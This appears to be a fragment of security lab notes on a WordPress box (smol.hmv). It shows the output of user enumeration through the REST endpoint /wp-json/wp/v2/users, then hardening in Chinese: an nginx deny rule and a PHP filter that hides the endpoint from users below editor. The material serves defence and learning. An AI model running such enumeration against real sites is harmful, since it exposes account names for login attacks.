"48": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&d=monsterid&r=g",
"96": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&d=monsterid&r=g"
},
"meta": [],
"_links": {
"self": [
{
"href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users/1",
"targetHints": {
"allow": [
"GET"
]
}
}
],
"collection": [
{
"href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users"
}
]
}
}
需要配置防火墙用来防止相关泄露。。。。
server {
location ~ ^/wp-json/wp/v2/users(/.*)?$ {
deny all;
return 403;
}
}
/**
* 禁用 WordPress 用户枚举接口,只有具有编辑权限(editor)及以上权限的用户才可访问。
*
* @author WPCOM
* @version 1.0.0
* @since 2024-12-26
*/
add_filter('rest_endpoints', function ($endpoints) {
global $has_users_endpoint;
if($has_users_endpoint) return $endpoints;
if(isset($endpoints['/wp/v2/users'])){
$users_endpoint = $endpoints['/wp/v2/users'];
unset($endpoints['/wp/v2/users']);
}
// 编辑及以上权限可展示用户列表
if (defined('REST_REQUEST') && REST_REQUEST && current_user_can('editor')) {
// 恢复 /wp/v2/users 端点
if(isset($users_endpoint)) $endpoints['/wp/v2/users'] = $users_endpoint;
$has_users_endpoint = true;
}
return $endpoints;
});
# functions.php